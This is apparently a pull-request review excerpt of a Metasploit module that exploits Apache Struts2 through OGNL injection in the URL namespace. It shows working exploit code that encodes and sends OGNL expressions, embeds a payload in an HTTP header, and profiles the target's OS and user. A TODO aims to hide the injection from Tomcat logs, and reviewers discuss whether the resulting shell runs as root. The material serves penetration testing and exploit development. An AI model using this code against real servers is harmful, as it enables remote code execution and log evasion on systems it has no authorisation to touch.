modules/exploits/multi/http/struts2_namespace_ognl.rb

```diff
@@ -0,0 +1,337 @@
+    encodable_chars = { "%": "%25",       # Always do this one first.  :-)
+                        " ": "%20",
+                        "\"":"%22",
+                        "#": "%23",
+                        "'": "%27",
+                        "<": "%3c",
+                        ">": "%3e",
+                        "?": "%3f",
+                        "^": "%5e",
+                        "`": "%60",
+                        "{": "%7b",
+                        "|": "%7c",
+                        "}": "%7d",
+                       #"\/":"%2f",       # Don't do this.  Just leave it front-slashes in as normal.
+                       #";": "%3b",       # Doesn't work.  Anyone have a cool idea for a workaround?
+                       #"\\":"%5c",       # Doesn't work.  Anyone have a cool idea for a workaround?
+                       #"\\":"%5c%5c",    # Doesn't work.  Anyone have a cool idea for a workaround?
+                      }
+
+    encodable_chars.each do |k,v|
+     #print_status("   #{k} -> #{v}")
+     #ognl.gsub!(k,v)                     # TypeError wrong argument type Symbol (expected Regexp)
+      ognl.gsub!("#{k}","#{v}")
+    end
+    return ognl
+  end
+
+  def send_struts_request(ognl, payload: nil)
+
+=begin  #badchar-checking code
+    pre = ognl
+=end
+
+    ognl = "${#{ognl}}"
+    vprint_status("Submitted OGNL: #{ognl}")
+    ognl = encode_ognl(ognl)
+
+    headers = {'Keep-Alive': 'timeout=5, max=1000'}
+
+    unless payload.nil?
+      vprint_status("Embedding payload of #{payload.length} bytes")
+      headers[datastore['HEADER']] = payload
+    end
+
+    # TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs
+    uri = "/#{ognl}/#{datastore['ACTION']}"
+
+    resp = send_request_cgi(
+     #'encode'  => true,     # this fails to encode '\', which is a problem for me
+      'uri'     => uri,
+      'method'  => datastore['HTTPMethod'],
+      'headers' => headers
+    )
+
+    if resp && resp.code == 404
+      fail_with(Failure::BadConfig, 'Server returned HTTP 404, please double check TARGETURI and ACTION')
+    end
+
+=begin  #badchar-checking code
+    print_status("Response code: #{resp.code}")
+    #print_status("Response recv: BODY '#{resp.body}'") if resp.body
+    if resp.headers['Location']
+      print_status("Response recv: LOC: #{resp.headers['Location'].split('/')[1]}")
+      if resp.headers['Location'].split('/')[1] == pre[1..-2]
+        print_good("GOT 'EM!")
+      else
+        print_error("                       #{pre[1..-2]}")
+      end
+    end
+=end
+
+    resp
+  end
+
+  def profile_target
+    # Use OGNL to extract properties from the Java environment
+
+    properties = { 'os.name': nil,          # e.g. 'Linux'
+                   'os.arch': nil,          # e.g. 'amd64'
+                   'os.version': nil,       # e.g. '4.4.0-112-generic'
+                   'user.name': nil,        # e.g. 'root'
```

Comment:
See comment about `Privileged` above. Were you running as the root user? I usually get a shell as the Tomcat user, which isn't necessarily root.

Reply:
Confirmed running as root in supplied Docker lab. This is not the case in standard unprivileged installs. This should be changed in the other modules, too.